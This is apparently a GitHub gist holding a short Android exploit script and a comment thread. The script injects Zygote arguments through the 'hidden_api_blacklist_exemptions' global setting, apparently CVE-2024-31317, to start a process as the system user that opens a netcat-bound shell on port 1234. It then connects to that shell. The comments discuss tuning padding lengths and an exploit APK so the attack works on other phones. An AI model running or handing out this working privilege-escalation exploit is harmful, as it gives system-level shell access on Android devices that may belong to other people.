-
-
Save ybtag/db3f3595139556c773fb94b7cbe668b5 to your computer and use it in GitHub Desktop.
| am force-stop com.android.settings | |
| settings put global hidden_api_blacklist_exemptions "LClass1;->method1( | |
| 15 | |
| --runtime-args | |
| --setuid=1000 | |
| --setgid=1000 | |
| --runtime-flags=2049 | |
| --mount-external-full | |
| --target-sdk-version=29 | |
| --setgroups=3003 | |
| --nice-name=runnetcat | |
| --seinfo=platform:su:targetSdkVersion=29:complete | |
| --invoke-with | |
| toybox nc -s 127.0.0.1 -p 1234 -L /system/bin/sh -l; | |
| --instruction-set=arm | |
| --app-data-dir=/data/ | |
| --package-name=com.android.settings | |
| android.app.ActivityThread | |
| " | |
| am start -a android.settings.SETTINGS | |
| nc localhost 1234 |
@rabits I also tried out the same GPU exploit on my Honor 10, but didn't get anywhere, sadly. But it's good to know that your Honor phone is on Android 13, as this needs some additional setup, as seen here:
https://github.com/ThexXTURBOXx/CVE-2024-31317/blob/main/31317/app/src/main/java/com/fh/exp31317/MainActivity.java#L230-L241
I am guessing that my code is already rather correct also for your device, but the padding does not have the correct length(s). Feel free to experiment with that a bit, of course, and let me know if you find some padding lengths that work!
When trying out a few length combinations, keep an eye on the logcat output. Especially when it says something like "Broken pipe", you need to act upon it. I just rebooted the entire device in this case. It may be enough to force-stop the exploit app and restart it, but I am not 100% certain and have not tried it.
I also encountered other errors that seemed rather odd and were undeterministic for some reason. Most of them can be ignored, but maybe the do actually carry some important info that you can (ab)use to your benefit (by comparing with the Zygote source code)
Probably not the update you waited for, but maybe it helps..?
I have pushed a version 1.0.2 of "my" exploit apk, which adds "Init Connection Mode".
There, the socket/shell is actually opened at the system user end. This has the advantage that the shell is reusable and the app can even tell you whether the exploit succeeded or not.
Currently, it tries to apply the exploit 20 times and gives up after that (you should probably restart your phone anyway if it fails that many times).
But yeah, maybe this is enough to finally get into your phone @rabits? :)
@ThexXTURBOXx thank you, sorry had not much time to even try - but yeah, surely test it next week.
Thank you @ThexXTURBOXx for the update! Checked on my still-the-same VER-N49 (Android 13, 7.2.0.108(C636E1R2P2)) - and no luck... In the meanwhile I tried some different approaches (like GPU exploit from Quest 3) - but still nothing... This is surely a tough nut to crack.